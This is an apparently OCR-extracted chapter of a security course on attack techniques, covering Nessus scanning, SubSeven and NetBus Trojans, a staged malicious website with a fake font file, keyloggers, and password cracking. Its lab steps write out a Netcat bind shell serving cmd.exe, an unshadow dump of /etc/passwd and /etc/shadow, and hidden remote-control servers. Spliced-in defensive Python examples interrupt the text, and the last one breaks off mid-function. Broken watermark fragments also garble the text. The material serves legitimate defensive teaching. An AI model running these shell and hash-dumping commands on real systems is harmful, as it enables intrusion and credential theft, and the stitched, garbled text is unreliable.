iti

on

Vulnerability found on port www (80/tcp) The piranha package is installed on the remote host. This package, as it is distributed with Linux RedHat 6.2, comes with the login/password combination 'piranha/q' (or piranha/piranha)

Solution: upgrade the packages piranha-gui, piranha, and piranha-docs to version 0.4.13 Risk factor: High CVE: CAN-2000-0248

Ed or ru ct
Figure 8-21: An example report after Nessus 1.2.7 has nished scanning.

st

In

DO

NO

T
Lesson 8: Attack Techniques

DU

PL

IC

AT

E
509

iti

From this report, you are able to identify the vulnerability and proceed to either exploit it (in the case of an attacker) or x it (in the case of the security administrator). Remember, CVE (Common Vulnerabilities and Exposures) identies current threats and gives them a standard name/identier for future use and discussion.

on

An attacker may use it to reconfigure your Linux Virtual Servers (LVS).
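A Nessus text report of this shape is easy to turn into a triage list. The following is an added example written for this guide, not code from the course or from the Nessus project: it parses per-port findings of the form shown above, collects the Risk factor and CVE lines, and sorts the findings by severity. The sample report embeds the piranha finding from the page plus two constructed entries (ftp and ssh); the severity ordering Serious > High > Medium > Low is an assumption for this example.

```python
import re
from dataclasses import dataclass, field

# Assumed severity ordering for triage (Nessus 1.x "Risk factor" strings).
RANK = {"Serious": 0, "High": 1, "Medium": 2, "Med": 2, "Low": 3, "None": 4}

HEADER_RE = re.compile(
    r"^(Vulnerability|Warning|Information) found on port (\S+) \((\d+)/(tcp|udp)\)\s*$"
)
RISK_RE = re.compile(r"^\s*Risk factor\s*:\s*([A-Za-z]+)")
CVE_RE = re.compile(r"^\s*CVE\s*:\s*(.+?)\s*$")


@dataclass
class Finding:
    kind: str                 # Vulnerability / Warning / Information
    service: str              # e.g. "www"
    port: int
    proto: str
    risk: str = "None"
    cves: list = field(default_factory=list)
    text: list = field(default_factory=list)


def parse_report(report: str) -> list:
    """Split a Nessus text report into one Finding per 'found on port' block."""
    findings, current = [], None
    for line in report.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = Finding(m.group(1), m.group(2), int(m.group(3)), m.group(4))
            findings.append(current)
            continue
        if current is None:
            continue                      # preamble before the first finding
        m = RISK_RE.match(line)
        if m:
            current.risk = m.group(1)
            continue
        m = CVE_RE.match(line)
        if m:
            current.cves.extend(t for t in re.split(r"[,\s]+", m.group(1)) if t)
            continue
        if line.strip():
            current.text.append(line.strip())
    return findings


def triage(findings: list) -> list:
    """Highest risk first; within a rank, lowest port first."""
    return sorted(findings, key=lambda f: (RANK.get(f.risk, 9), f.port))


def count_by_risk(findings: list) -> dict:
    """The 'security risks by rank' summary the report header gives."""
    counts = {}
    for f in findings:
        counts[f.risk] = counts.get(f.risk, 0) + 1
    return counts


# Constructed sample: the piranha finding from the page plus two made-up entries.
SAMPLE_REPORT = """\
Vulnerability found on port www (80/tcp)
  The piranha package is installed on the remote host.
  This package, as it is distributed with Linux RedHat 6.2, comes with
  the login/password combination 'piranha/q' (or piranha/piranha)
  An attacker may use it to reconfigure your Linux Virtual Servers (LVS).
  Solution: upgrade the packages piranha-gui, piranha, and piranha-docs to version 0.4.13
  Risk factor: High
  CVE: CAN-2000-0248

Warning found on port ftp (21/tcp)
  The remote FTP server allows anonymous logins.
  Risk factor: Low

Information found on port ssh (22/tcp)
  Remote SSH version: SSH-1.99-OpenSSH_3.1p1
  Risk factor: None
"""

if __name__ == "__main__":
    for f in triage(parse_report(SAMPLE_REPORT)):
        print(f"{f.risk:<8} {f.port}/{f.proto:<4} {f.service:<6} {' '.join(f.cves)}")
    print(count_by_risk(parse_report(SAMPLE_REPORT)))
```

The CVE field is what lets you correlate the same hole across scanners and advisories; the identifier CAN-2000-0248 in the report is a candidate number that was later confirmed as a CVE entry, so a triage script should accept both the CAN- and CVE- prefixes, as the regex above does.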

TASK 8D-5
Installing Nessus for First-time Use

Setup: You are logged on to Linux as root, and a Terminal Window is open.

Provide students with the location of the Nessus installer script file.

1. In your /root directory, create a directory named nessus.
2. Copy the Nessus installer script file from the location provided by your instructor to the new /root/nessus directory.
3. In the Terminal Window, switch to the /root/nessus directory and enter sh nessus-installer.sh to begin the installation.
4. Follow the prompts, and accept the default installation directory of /usr/local. Ignore any warning messages that are displayed, and wait for the installer script to complete. This will take several minutes, so please be patient.
5. If necessary, press Enter to accept the default file location.
6. Observe the Congratulations message that is displayed when installation is complete. The message lists instructions for several tasks related to setting up Nessus.
7. Let's create a certificate first. Press Enter.
8. Enter nessus-mkcert and accept the default values for lifetimes.
9. Enter the applicable data for Country, State/Province, and Location.
10. For Organization, enter SCNPclass.
11. After the certificates are created, press Enter to return to the command line. Next, we'll create a user.
12. Enter nessus-adduser and for Login, enter testuser.
13. For Authentication, press Enter to select the default of password.
14. For Password, enter password.
15. For the Rules, you will use an Empty Rule Set. Press Ctrl+D to finish this part of the Nessus setup.
16. Answer Yes when you are prompted.

Scanning for Vulnerabilities with Nessus

We will now see how Nessus is used to scan a target network. You first need to start the Nessus daemon; then, you can scan hosts and networks for security vulnerabilities.

TASK 8D-6
Using Nessus for Vulnerability Scanning

Setup: You are logged in to Linux as root, the Nessus tool has been installed, and a nessus user has been created.

1. If necessary, open a Terminal Window, and enter nessusd -D to start the Nessus daemon. After a short pause, the command line is displayed.
2. Enter nessus to open the Nessus Setup window.
3. On the Nessusd Host tab, log in with the user account testuser and the password password. Click Log In.
4. Click OK to close the SSL Setup window, then click Yes to accept the certificate.
5. Click OK to close the Warning box.
6. Once you are logged in, on the Target Selection tab, enter a target IP address in the class.
7. Click the Start The Scan button. This scan will take a few minutes to complete, so please be patient.
   You might need to move the window up to reach the Start The Scan button.
8. When the scan has ended, view the results.
9. Under Subnet, select the target. Under Host, select the target. Under Port, select a port that has an exclamation point icon. Under Severity, select Security Warning, and read the information displayed in the lower-right pane.
10. Under Port, select a port that has a red circle with a yellow bar inside it. Under Severity, select Security Hole, and read the information displayed in the lower-right pane.
11. Observe that you can even save the report in several formats on the hard drive for later review.
12. Close all open windows. You can save the report if you like.

Topic 8E
Viruses, Worms, and Trojan Horses

When networks were not as big a part of business and everyday life as they are now, the concept of having a virus on the computer was unknown to most people. Today, there are millions and millions of people who are aware, in one way or another, that there are such things as computer viruses, and that they usually are bad. Although all these people are aware that such creatures exist, many network administrators cannot tell the difference between a virus and a worm.

Differentiating Between a Virus and a Worm

In a similar vein to every computer criminal being lumped into the term hacker by the media, the same goes for the virus and worm (as well as the Trojan Horse, for that matter). So, virtually every incident with one of these programs will be referred to by the major media as a virus.

For this topic, we shall refer to the NSA definitions:
- A virus is a program that can infect other programs by modifying them to include a possibly evolved copy of itself.
- A worm is an independent program that replicates from machine to machine across network connections, often clogging networks and information systems as it spreads.

To put this in perspective, the names of these programs are appropriate. A virus requires a host while a worm does not. The worm is self-sufficient, and the virus is not. This distinction should make it clear that a worm is more dangerous to the network than a virus is.

The vast majority of viruses used to be transmitted on floppy disks. But, thanks to the wonderful connectivity the Internet provides, the hacker does not need to be limited to getting a floppy disk into the network to do the job. A simple email will do. Even with all the publicity about opening attachments, spreading a virus or worm via an email attachment is still the most prevalent way to spread the program.

Outlook and Outlook Express became the method of choice for transmitting email viruses and worms over the last few years. Even casual users became aware of the names Melissa, Worm.Explore.Zip, BubbleBoy, ILoveYou, and so on. These simple worms would simply replicate themselves to the names and addresses in a user's Address Book. This made the worm seem to come from a trusted source. It was due to this deception that these worms moved around networks so quickly.

Sending a virus or worm hidden in a Trojan Horse is one of the common ways to move a malicious program around the network.

The Trojan Horse

To complement the worm and virus discussion, one needs to discuss the Trojan Horse. Generally, a Trojan Horse is a program disguised as something else to allow for the installation and execution of one of the previously mentioned remote-control applications. The "something else" that intelligent hackers will often disguise their application as is a small game program. There is a reason for this. Most people cannot help but play a new, addictive, small, easy-to-play game. And, if it is simple and fun enough, it will circulate around an office very quickly. Perhaps the most infamous example of the Trojan Horse doing this very function is the game Whack-A-Mole. This game is, in fact, the Trojan Horse for NetBus. This program spread around many companies very quickly and is still in wide circulation. Most people will be very surprised when you inform them they have run a Trojan Horse program. Figure 8-22 shows some of the capabilities of NetBus. More about NetBus is included later in this topic.

Figure 8-22: An example of the control portion of NetBus version 1.70. Notice the different options on the various buttons.

Another very smart Trojan Horse example is BoSniffer. This program is billed as a program to search out and clean Back Orifice from a given system, when it is really Back Orifice itself! So the net result is that running this program to remove Back Orifice from a system actually installs it. Very clever.

The SubSeven Trojan

SubSeven is one of the most widely used Trojan Horse programs available. Most hackers are aware of SubSeven and what it can do. In order for you to properly understand how to defend against this program, you must use it firsthand yourself.

Controlling the Target

A common way for SubSeven to be packaged is as a zip file containing three EXE files. These three files are the files used to run and manage the program. They are:
- Server.exe. This is the file that is installed on the victim's computer.
- EditServer.exe. This is the file that can be used to modify the available options that the server.exe can provide to the attacker.
- Sub7.exe. This is the file used by the attacker to control the victim's computer.

Some of the options that the EditServer.exe has are:
- Define the port on the victim that SubSeven will use.
- Define a password to protect the server program.
- Define email options. These options include:
  - Email every password to an attacker.
  - Email every pressed key to an email address.
  - Email passwords for connections to the Internet to the attacker.
- Define notification options. This can be most dangerous, as the notification options are:
  - Email the attacker every time the server application runs.
  - Notify the attacker via IRC when the server application runs.
  - Notify the attacker via ICQ when the server application runs.

When SubSeven is installed on a computer, several files and Registry entries will be modified. Examples of the files that can be found on an infected computer are:
- Server.exe
- Rundll1.exe
- Systray.dll
- Task_Bar.exe
- FAVPNMCFEE.dll
- MVOKH_32.dll
- Nodll.exe
- Watching.dll

In addition to files added to the victim computer, several config files may be modified as well. Examples of the modified files are:
- Win.ini: this file will have a modification to the load= or run= statement.
- System.ini: this file will have a modification to the shell= statement.

NetBus

Any discussion of Trojan Horse programs would be incomplete without examples and using NetBus. Most hackers are aware of NetBus and what it can do. In order for you to properly understand how to defend against this program, you must use it firsthand yourself. NetBus uses a two-part system to control a victim computer. There is a server program that must be executed on the target computer and a client program that the attacker will run to take control of the target.

The server program can be renamed to anything the attacker wants to use, and often will be in order to better hide the application from detection. Common examples of the renamed server program could be Explore.exe or winsys32.exe, with the point being to make the application look like a system file. Different versions of NetBus have used different names for the server program. It has been called sysedit.exe, patch.exe, and server.exe. NetBus commonly uses port 12345 to connect, although newer releases allow for modification of the server port to use.

Regardless of the server name, it should be found in the Registry in the following location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Several versions of NetBus are available on the Internet. In this section, we will discuss two different versions: one slightly older version, named NetBus 1.7, and a newer version, named NetBus Pro. Then, you will try out NetBus Pro in a hands-on activity.
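The three persistence points named above (win.ini load=/run=, system.ini shell=, and the HKLM Run key) are exactly what a defender should baseline and diff. The following is an added example written for this guide, not code from the course or from either Trojan: it checks copies of win.ini and system.ini and a regedit export of the Run key against a clean baseline. The baseline (Explorer.exe as the only shell, empty load=/run=, and an allowlist holding one Run value) and all three sample files are constructed for the example; the file names that appear in them (Rundll1.exe, Task_Bar.exe, patch.exe) are taken from the lists on this page.

```python
import re

# Baseline assumptions for a clean Windows 2000 box (example values, not from the course).
EXPECTED_SHELL = "explorer.exe"
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
KNOWN_RUN_VALUES = {"synchronization manager": r"mobsync.exe /logon"}  # hypothetical allowlist


def _ini_values(text: str, section: str, keys: set) -> dict:
    """Return {key: value} for the wanted keys inside one [section] of an .ini file."""
    found, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            continue
        if current == section.lower() and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() in keys:
                found[key.strip().lower()] = value.strip()
    return found


def check_win_ini(text: str) -> list:
    """win.ini: [windows] load= and run= are empty on a clean box; anything there runs at logon."""
    vals = _ini_values(text, "windows", {"load", "run"})
    return [f"win.ini [windows] {k}={v}" for k, v in vals.items() if v]


def check_system_ini(text: str) -> list:
    """system.ini: [boot] shell= must be exactly Explorer.exe; an appended program is the classic hook."""
    shell = _ini_values(text, "boot", {"shell"}).get("shell", "")
    parts = shell.split()
    if not parts or parts[0].lower() != EXPECTED_SHELL or len(parts) > 1:
        return [f"system.ini [boot] shell={shell}"]
    return []


def check_run_key(reg_export: str) -> list:
    """Parse a .reg export of the Run key; report values missing from the allowlist."""
    findings, in_run = [], False
    for raw in reg_export.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_run = line[1:-1].lower() == RUN_KEY.lower()
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if in_run and m:
            name, cmd = m.group(1), m.group(2).replace("\\\\", "\\")  # undo .reg escaping
            if KNOWN_RUN_VALUES.get(name.lower(), "").lower() != cmd.lower():
                findings.append(f"Run\\{name}={cmd}")
    return findings


def audit(win_ini: str, system_ini: str, reg_export: str) -> list:
    return check_win_ini(win_ini) + check_system_ini(system_ini) + check_run_key(reg_export)


# Constructed sample files for an infected box (not captured from a real system).
WIN_INI = r"""[windows]
load=
run=C:\WINNT\Rundll1.exe
[Desktop]
Wallpaper=(None)
"""
SYSTEM_INI = r"""[boot]
shell=Explorer.exe Task_Bar.exe
[386Enh]
device=*vpd
"""
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Synchronization Manager"="mobsync.exe /logon"
"patch"="C:\\WINNT\\patch.exe /nomsg"
"""

if __name__ == "__main__":
    for finding in audit(WIN_INI, SYSTEM_INI, REG_EXPORT):
        print("SUSPECT:", finding)
```

Run it against files copied off the suspect machine rather than on the machine itself; a Trojan with a running server can hide or rewrite the live copies.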

NetBus 1.7

NetBus 1.7 has a simple interface, with options such as opening and closing the CD-ROM or sending system messages. It also has the ability to provide more serious functions, such as shutting down the remote computer, viewing remote files, and sending the remote host to a URL. While the last option may not seem that critical, in an environment where Internet use is a strict and regulated policy, sending a remote computer to a known disallowed URL can have a serious impact.

Figure 8-23: An example of available options for NetBus version 1.7.

NetBus Pro

NetBus Pro is a more advanced version of NetBus than version 1.7. Many of the options are the same; however, there are differences, as you will see. Figure 8-24 shows some of the available options in NetBus Pro.

Figure 8-24: Options available in NetBus Pro.

TASK 8E-1
Using NetBus Pro

Setup: You are logged on to Linux as root. Your instructor will assign each of you a role as an attacking computer or a target computer. For instance, if you were designated as Student_P earlier in the course, you might now be designated as an attacker for this task.

Provide students with the location of the NetBus Pro installation files.

Note: Perform the following step on all student computers.
1. Boot to Windows 2000, and log on as the renamed Administrator account. Run the NetBus Pro setup program from the location provided by your instructor.
Note: Perform the following step only if you are designated as an attacking computer for this task.
2. Run the NetBus Pro application to open the control portion of the program.
Note: Perform step 3 and step 4 only if you are designated as a target computer for this task.
3. Start NetBus Server, click Settings, and check Accept Connections.
4. Under Visibility Of Server, select Only In Tasklist, and click OK.
Note: Perform step 5 through step 7 only if you are designated as an attacking computer.
5. In the NetBus Pro application, choose Host→New, and enter the IP address of the target computer. Click OK. The target should now be listed in the GUI as a destination.
6. Right-click the target computer, and choose Connect.
7. Once you are connected, try some of the different options, such as opening and closing the CD-ROM bay, capturing screen images, keyboard listening, and so forth.
   If time permits, allow students 5 to 10 minutes to explore the NetBus options.
Note: Perform the rest of this task on all student computers.
8. Close all open windows, and reboot to Windows 2000 as the renamed Administrator account.
9. Repeat this task, switching roles with your partner.

Topic 8F
Malicious Web Sites

In another lesson, you studied some of the techniques used by malicious Web sites to target ordinary users. Indeed, most attacks targeting ordinary users are rather unsophisticated and depend on computerized social engineering to get the job done; that is, getting the user to agree to something, such as downloading a file or clicking OK on some kind of executable, script, or batch file.

In the following task, the instructor will set up a simple and innocent-looking Web site. The Web site proclaims to help a user verify his or her browser's security and offers various templates for the job. When the user clicks on a template, an error pops up telling the user that the required font was not found and offers a link to install the appropriate font, with instructions to the user to click Open. When the user clicks on the link to the font, a popup shows up, the user clicks Open, there's a brief flicker on the screen, and the user has just installed something malicious.

INSTRUCTOR TASK 8F-1
Implementing a Malicious Web Site

Setup: Observe as your instructor performs this task on the instructor machine.

1. If necessary, log on to your Windows 2000 Server as the renamed Administrator account.
2. Navigate to the \085545\Data\HTML Files folder on the course CD.
3. Copy the Malweb subfolder onto your boot partition, in the Inetpub folder.
4. Navigate to the \WINNT\Help\iishelp\common folder.
5. Rename the 404b.htm file as 404b-old.htm.
6. From the Inetpub\Malweb folder, copy the file 404b.htm to the WINNT\Help\iishelp\common folder.
7. Start Internet Services Manager.
8. In the left pane, expand the host, right-click Default Web Site, and choose Stop.
9. Right-click Default Web Site, and choose Properties.
10. Click the Home Directory tab. Browse to navigate to the Inetpub\Malweb folder and click OK.
11. Click the Documents tab, then click Add.
12. For Add Default Document, enter malweb.htm, and click OK.
13. Select malweb.htm, and click the Up Arrow button until the file is at the top of the list.
14. Click OK.
15. If necessary, click OK to close the Inheritance Overrides information box.
16. Right-click Default Web Site, and choose Start.

Visiting a Malicious Web Site

Now, let's see what happens to the unsuspecting user when he or she happens upon the Malweb site that your instructor just implemented.

TASK 8F-2
Falling Victim to a Malicious Web Site

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Start Internet Explorer.
2. In the Address box, enter http://172.17.10.1. If the Content Advisor opens, enter the password 1234 and click OK to be able to view the site. You should be presented with a Web site indicating that your browser may not be secure and that you can evaluate your browser's security using a template.
3. Click any one of the templates (T1, T2, or T3) to display a page that indicates a required font was not found.
4. Click the Back button, or click the link to go back to 172.17.10.1's home page.
5. Now, read the instructions regarding fonts.
6. You're a savvy computer user, so place your mouse over the hyperlink in the sentence "Please install the following font."
7. At the bottom of your browser window, read the explanation for the link. It should say http://172.17.10.1/acrylic1.fnt, so it's OK; it's only a font, not a malicious program. Your guard is down.
8. Open Windows Explorer, and navigate to the \085545\Data\HTML Files folder on your course CD. Examine the file acrylic1.fnt. Widen the File Name column to view the entire file name. This isn't really a font file, it's a command script!
9. Close all open windows.
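The trick in this task works because Explorer and the browser status bar both show a truncated name, and because clicking Open runs whatever the final extension says it is. The following is an added example written for this guide, not code from the course: it applies two checks a download filter or mail gateway would apply to a file before the user sees it, the double-extension check and a claimed-type-versus-content check. The sample file name acrylic1.fnt.cmd and its contents are constructed for the example (the course file's real name is not given on this page); the executable-extension list is an assumption.

```python
from pathlib import PurePath

# Extensions Windows runs when the user clicks Open (assumed list for this example).
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse",
                   ".wsh", ".wsf", ".scr", ".pif", ".hta"}
FONT_EXTS = {".fnt", ".fon", ".ttf", ".otf"}
# Leading bytes of real TrueType/OpenType font files.
FONT_MAGIC = (b"\x00\x01\x00\x00", b"true", b"OTTO", b"ttcf")


def looks_like_text(data: bytes) -> bool:
    """True when the first 512 bytes are almost entirely printable ASCII (a script, not a font)."""
    sample = data[:512]
    if not sample:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in sample)
    return printable / len(sample) > 0.95


def classify_download(filename: str, data: bytes) -> dict:
    """Return a verdict on a downloaded file: what it claims to be versus what it is."""
    suffixes = [s.lower() for s in PurePath(filename).suffixes]
    real = suffixes[-1] if suffixes else ""
    shown = suffixes[-2] if len(suffixes) >= 2 else real   # what a narrow column displays
    reasons = []
    if real in EXECUTABLE_EXTS:
        reasons.append(f"final extension {real} is executable")
    if len(suffixes) >= 2 and real in EXECUTABLE_EXTS and shown not in EXECUTABLE_EXTS:
        reasons.append(f"double extension: shown as {shown}, really {real}")
    if shown in FONT_EXTS and looks_like_text(data) and not data.startswith(FONT_MAGIC):
        reasons.append("claims to be a font but the content is plain text (script?)")
    return {"filename": filename, "executable": bool(reasons), "reasons": reasons}


# Constructed samples: a lure named to look like a font, and a genuine TrueType header.
LURE_NAME = "acrylic1.fnt.cmd"
LURE_DATA = b"@echo off\r\necho this would run with the victim's privileges\r\n"
REAL_FONT_DATA = b"\x00\x01\x00\x00" + bytes(64)

if __name__ == "__main__":
    for name, data in ((LURE_NAME, LURE_DATA), ("arial.ttf", REAL_FONT_DATA)):
        print(classify_download(name, data))
```

Checking the content matters as much as the name: a file called acrylic1.fnt with no second extension would pass a name-only filter, but a batch script still fails the content check.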

Topic 8G
Gaining Control Over the System

We will see how a system can be compromised by using Netcat.

Netcat is a tool that can open a connection to any port on any computer it can reach, or listen on a port and hand whatever connects to a program such as a command shell. This is part of the danger of using such a powerful tool. Sitting at a Windows 2000 computer, you can gain control of a Linux box, and sitting at a Linux computer, you can gain control of a Windows computer. All without having to provide any authentication!

TASK 8G-1
Using Netcat

Setup: You are logged on to Windows 2000 as the renamed Administrator account. Your instructor will tell you whether you are to play the role of target computer or attacking computer.

Provide students with the location of the Netcat files.

Note: Perform step 1 through step 5 only if you are designated as a target computer.
1. At the root of your boot partition, create a folder called nc.
2. Copy the Netcat files from the location provided by your instructor to the new nc folder.
3. If necessary, unzip the Netcat files.
4. Open a Command Prompt, and switch to the nc directory.
5. Enter nc -l -p 2020 -e cmd.exe.
Note: Perform step 6 through step 11 only if you are designated as an attacking computer.
6. Log on to Linux as root.
7. Open a Terminal Window.
8. Enter nc target_IP_address 2020.
9. Observe that you now have what looks very much like a Windows command prompt. There is a very good reason for that: it is! Navigate around and see that you have full control, just as if you were sitting at the Windows machine with an open command prompt. Do not do anything that will disrupt the normal functions of the machine.
10. Enter exit to return to the Linux machine.
11. Reboot to Windows 2000 as the renamed Administrator account.
Note: Perform the next step only if you are designated as a target computer.
12. Close all open windows.
If time permits and students are interested, have them switch roles and repeat this activity.

Topic 8H
Keystroke and Password Attacks

Recording Keystrokes

Although the Trojan Horses have their place in attacking computers, they may be more than the attacker needs. Perhaps the only desire is to track the keys that are pressed on a target computer. If this is the case, Trojan Horses, even though they may have this ability, are too much.

Keystroke logging can be one of the most dangerous attacks to deal with, since the capture can take place below the level of the operating system and, therefore, be close to impossible to detect from within the system. There are both hardware- and software-based implementations of keystroke logging.

The level of difficulty of detection can also be connected to the level of difficulty in placing the keystroke-logging application on the target. For example, the hardware keystroke loggers require physical access to the target computer. In the event that physical access is granted, these can be very hard to detect. But, before we get too deep into the world of hardware keylogging, let's look at a software keylogger.

TASK 8H-1
Using Software Keystroke Logging

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and all windows have been closed.

Provide students with the location of the Klogger files.

1. Create a new folder named Klogger.
2. Copy the Klogger program from the location specified by your instructor to the new Klogger folder.
3. Double-click Klogger to start the application. The only indication that something is happening is the display of the hourglass icon.
4. Open Notepad, and type a short message to yourself. Then close Notepad; there is no need to save the file.
5. Switch to Explorer, open the Klogger folder, then open the klogger.txt file, and read its contents.
6. Close all open windows, reboot, and log on to Windows 2000 Server as the renamed Administrator account.

Hardware Keyloggers

We can now look at our first hardware keystroke logger. Figure 8-25 shows a small hardware device that can be placed between the keyboard and the computer. Once the device has been installed, the attacker can log keystrokes and collect the data stored inside. The scary part about this kind of device is that it is completely independent of the operating system. A default installation using a device, such as those manufactured by KeyGhost, allows all captured keystrokes to be displayed in any text editor simply by entering the command vghostlog.

Figure 8-25: A keyboard-logging device. (Picture from keyghost.com.)

The smallest loggers are simple devices that are connected between the keyboard cable and the computer. Without physically looking, there is no chance to detect this device.

In the event that even a higher level of stealth is required, the next step is to replace the keyboard altogether. By doing this, there is no clue that there is keystroke logging implemented on this machine. All of the logging is done via a chip embedded in the new keyboard. The attacker needs only to retrieve the keyboard and download the data from the chip.

INSTRUCTOR TASK 8H-2
Using a Keystroke-logging Keyboard

Objective: To observe the installation and use of a keystroke-logging keyboard.

1. Connect a keyboard that is designed to record keystrokes to your instructor machine. As shown in the graphic below, these types of keyboards usually don't look any different from a standard keyboard.
2. Once the keyboard has been installed, show the class how it can be used to collect data, as well as how to retrieve the data stored in it.

Topic 8I
Cracking Encrypted Passwords

If getting a physical key-logging device to the target for capturing passwords is not an option, and it often isn't, the next point a hacker must address is acquiring and cracking passwords. There are many tools available on the Internet for this task, but for class purposes, we will look at three of the most popular ones: L0pht 2.5, L0phtCrack LC4, and John the Ripper.

Cracking Passwords with L0pht

One of the most popular password-cracking tools is L0pht. This tool will dump the password hashes from a target computer, and then crack them. There are many versions of L0pht, and the programmers have now teamed up with a legitimate security company to create commercial products to use. Their commercial products are used as legitimate administration tools to audit the strength of user passwords.

L0pht 2.5

Let's take a look at one of the older versions of L0pht, version 2.5. In Figure 8-26, you can see that password information has been pulled from the Registry.

Figure 8-26: An older version of L0pht, just after password information has been dumped from the Registry.

Figure 8-27 shows some of the options available in version 2.5 of L0pht.

Figure 8-27: Some of the cracking options available in L0pht 2.5.

And Figure 8-28 shows the successful cracking of passwords.

Figure 8-28: Passwords are cracked!

L0pht LC4

Now that you have seen an older version of L0pht, let's look at one of its related applications, L0phtCrack 4, or L0pht LC4. Figure 8-29 shows some of the options available in this application for gaining access to the passwords that you want to crack.

Figure 8-29: Options for getting encrypted passwords in L0phtCrack LC4.

Figure 8-30 shows the auditing and password-strength options.

Figure 8-30: L0phtCrack LC4 auditing and password strength options.

Figure 8-31 shows L0pht LC4 in action.

Figure 8-31: Password audit in progress.

If time is an issue, you can assign one-half of the students to do the L0pht LC4 (Windows 2000) exercise, and the remaining one-half of the students to do the John the Ripper (Linux) exercise, so that everyone can see the differences between the password crackers without having to use both in class.

TASK 8I-1
Using L0pht LC4

Setup: You are logged on to Windows 2000 Server as the renamed Administrator account.

Provide students with the location of the LC4 installation files.

1. Create a folder named LC4 on your hard drive.
2. Copy the LC4 setup program from the location provided by your instructor to the new LC4 folder.
3. Run LC4setup, accepting all defaults during the installation routine.
4. Open the Custom_GPO you created earlier in the course, and disable all password policies. Close the Custom_GPO when you are finished.
5. Create four new user accounts, assigning passwords as follows:
   a. One password that is blank (null).
   b. One password that is the same as the user name.
   c. One password that contains only numbers.
   d. One password that contains only random letters.
6. Start the L0pht LC4 application.
7. Click Trial. The LC4 Wizard opens.
8. Click Next twice, then click Custom, and click Custom Options.
9. Uncheck Perform A Brute Force Attack On The Passwords, and click OK.
10. Click Next twice, and then click Finish. The password audit starts automatically.
11. While the audit is running, open the Task Manager on your computer, and note your current processor usage.
12. When the Auditing Session Complete message is displayed, click OK.
13. Review the results. At least some of the four easy passwords you assigned during this task should be cracked. The more complex passwords that you created earlier in the course might be only partially cracked.
14. Close all open windows. You do not need to save changes.

Cracking Passwords with John the Ripper

The passwords used in any operating system are critical to protect, and Linux is no different in this regard. Just as there are methods to crack the passwords in Windows NT or Windows 2000, there are methods to crack the passwords in Linux.

Two common password crackers are Crack and John the Ripper. In both cases, it is required to gain access to the password file, then have that file processed by the cracking program.

These programs can use much of a computer's resources, so running them on a production machine is not a good idea.

John the Ripper is among the newer password crackers available, and has gained great notoriety as it is very fast, and can handle several password hashing algorithms. We will now look at using John the Ripper to crack passwords in Linux (although a version has been ported to NT).

TASK 8I-2
Using John the Ripper

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

Provide students with the location of the John the Ripper installation files.

1. Log in to Linux as root.
2. In the /root directory, create a new directory called JohnTR.
3. Copy the John the Ripper installation files from the location provided by your instructor to the new JohnTR directory. In most cases, you will be provided with a compressed file called john-1.6.tar.gz, but if you are provided with a directory called john-1.6, you can skip the next step.
4. If necessary, open a Terminal Window, switch to the JohnTR directory, and unzip the john-1.6.tar.gz file by using the gzip -d john-1.6.tar.gz command. This command will unzip the files to a file called john-1.6.tar. If necessary, untar the john-1.6.tar file by using the tar -xf john-1.6.tar command. This command will untar the file into a directory called john-1.6.
5. Switch to the john-1.6 directory, and list its contents. This directory contains another directory that contains the source files.
6. Switch to the src directory to prepare for the installation.
7. To start the actual installation, enter make to display a list of system types. If your system type is matched, make a note of it.
   Your instructor can help you determine if you have a matching system type.
8. If you have a matching system type, enter make system_type, where system_type is the actual system type of your computer. If you do not have a matching system type, enter make generic. This command will start the installation. When it is finished, you will be ready to run the John the Ripper application.
9. To get ready to run the application, enter cd .. to move up one directory, then enter cd run to move into the run directory.
10. In a Terminal Window, create four new user accounts, assigning passwords as follows:
   a. One password that is blank (null).
   b. One password that is the same as the user name.
   c. One password that contains only numbers.
   d. One password that contains only random letters.
   We now need to merge the password files into a single text file first so that we can crack them from a copy.
11. Enter ./unshadow /etc/passwd /etc/shadow > pwd.txt. Next, we need to restrict permissions on the text file, because it now holds the password hashes that /etc/shadow normally keeps readable by root only.
12. Enter chmod 600 pwd.txt. We are now ready to let John do his work and crack our passwords.
13. Enter ./john pwd.txt.
14. Let the program run, watching for output on your screen. At least some of the passwords should be cracked.
15. When you are ready to move on, close all open windows.
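Steps 10 through 14 are a complete workflow: merge passwd and shadow, then try candidates against each hash in the order most likely to succeed. The following is an added example written for this guide, not code from the course or from John the Ripper, that carries that workflow out on constructed data. unshadow does what John's unshadow does (substitute the hash from shadow for the x in passwd); candidates generates guesses in the order of the four weak classes the task creates (blank, the user name, digits, short lowercase strings). One assumption is explicit: the hash scheme is a stand-in, toy_crypt, built on SHA-512 with a salt, because Python no longer ships crypt(3); real shadow entries use the system crypt scheme, and John knows those formats, but the merge and the candidate loop are the same.

```python
import hashlib
import itertools
import string


def toy_crypt(password: str, salt: str) -> str:
    """Stand-in for crypt(3), used only so the example is self-contained.
    Format: $toy$<salt>$<sha512 hex of salt+password>."""
    digest = hashlib.sha512((salt + password).encode()).hexdigest()
    return f"$toy${salt}${digest}"


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Merge /etc/passwd and /etc/shadow the way John's unshadow does:
    the 'x' in passwd's second field is replaced by the hash from shadow."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            name, hsh = line.split(":", 2)[:2]
            hashes[name] = hsh
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return "\n".join(merged) + "\n"


def candidates(username: str, wordlist=(), max_len: int = 4):
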